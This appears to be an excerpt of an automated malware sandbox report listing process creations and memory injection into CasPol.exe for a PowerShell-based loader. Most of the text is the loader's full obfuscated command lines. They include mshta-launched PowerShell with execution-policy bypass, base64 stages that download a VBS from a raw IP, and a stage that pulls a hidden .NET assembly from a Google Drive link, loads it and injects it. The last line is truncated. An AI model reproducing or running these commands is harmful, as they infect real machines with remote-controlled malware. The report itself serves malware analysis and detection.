h3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Injects a PE file into a foreign processes
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
              Writes to foreign memory regions
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 415000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 41A000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 4A0000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 7EFDE008
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS" Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE550.tmp" "c:\Users\user\AppData\Local\Temp\1nxbdaco\CSCDA0B5C0F54B64E9AA66FC6FE2D4D8162.TMP"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2BF1.tmp" "c:\Users\user\AppData\Local\Temp\vbdaauwq\CSC29236E271A724343A6FBC96F9241CBFB.TMP"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jet2icagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagieferc10wvbficagicagicagicagicagicagicagicagicagicaglu1fbujfckrfrkloavrpb24gicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmtw9olkrstcisicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagie5ieg0sc3ryaw5nicagicagicagicagicagicagicagicagicagicagtg1ba1bebmvhlhn0cmluzyagicagicagicagicagicagicagicagicagicagigjmbllkyix1aw50icagicagicagicagicagicagicagicagicagicagennxu0fxleludfb0ciagicagicagicagicagicagicagicagicagicagiefyryk7jyagicagicagicagicagicagicagicagicagicagic1oyu1ficagicagicagicagicagicagicagicagicagicagimtuwgxfd0tybndriiagicagicagicagicagicagicagicagicagicagic1uyw1fu3bhq0ugicagicagicagicagicagicagicagicagicagicbivvz4icagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicrldjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5oc40ni4xnzgumtu1lzqymi9zzwv0agvizxn0dghpbmdzd2l0agdvb2r0agluz3nmb3jnzxrtzwjhy2t3axroymvzdhroaw5ncy50suyilcikzu5wokfquerbvefcc2vldghlymvzdhroaw5nc3dpdghnb29kdghpbmdzzm9yz2v0bwviywnrlnziuyismcwwkttzdefydc1ztgvfucgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcc2vldghlymvzdhroaw5nc3dpdghnb29kdghpbmdzzm9yz2v0bwviywnrlnziuyi='+[char]0x22+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'ligor2vulvzhcmlhymxficcqturskicplm5bbuvbmywxmswyxs1kt2lojycpicgoj3dwvwltywdlvxjsid0gu3fwahr0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3cnkydubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlunkydoqll3dxigjysnu3fwo3dwvxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7d1zvaw1hz2vcexrlcya9iccrj3dwvxdlyknsawvudc5eb3dubg9hzerhdgenkycod1zvaw1hz2vvcmwpo3dwvwltywdljysnvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvujysnrjgnkycur2v0u3ryaw5nkhdwvwltywdlqnl0zxmpo3dwvxn0yxj0rmxhzya9ifnxcdw8qkftrty0x1nuqvjupj5tcxa7d1zvzw5krmxhzya9ifnxcdw8qkftrty0x0vord4+u3fwo3dwvxn0yxj0sw5kjysnzxggpsb3vlvpbwfnzscrj1rlehqusw5kzxhpzih3vlvzdgfydezsjysnywcpo3dwvwvujysnzeluzgv4id0gd1zvaw1hz2vuzxh0lkluzgunkyd4t2yod1zvzw5krmxhzyk7d1zvc3rhcnrjbmrlecatz2ugmcatjysnyw5kihdwvwvuzeluzgv4iccrjy1ndcb3vlvzdgfydeluzgv4o3dwvxn0yxj0sw5kzxggjysnkz0gd1zvc3rhcnrgbgfnlkxlbmd0adt3vlviyxnljysnnjrmzw5ndgggpsb3vlvlbmrjbmrlecatihdwvxn0yxj0sw5kzxg7d1zvymfzzty0q28nkydtbwfuzca9ihdwvwltywdlvgv4dc5tdwjzdhjpbmcod1zvc3rhcnrjbmrleccrjywgd1zvymfzzscrjzy0tgvuz3roktt3vlviyxnlnjrszxzlcnnlzca9ic1qb2luich3vlviyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgalzujysniezvckvhy2gtt2jqzwn0ihsgd1zvxyb9kvstms4ulsh3vlviyxnlnjrdjysnb21tyw5klkxlbmd0acldo3dwvwnvbw1hjysnbmrcexrlcya9ifttescrj3n0zw0uq29udmvydf06okzyb21cyxnlnj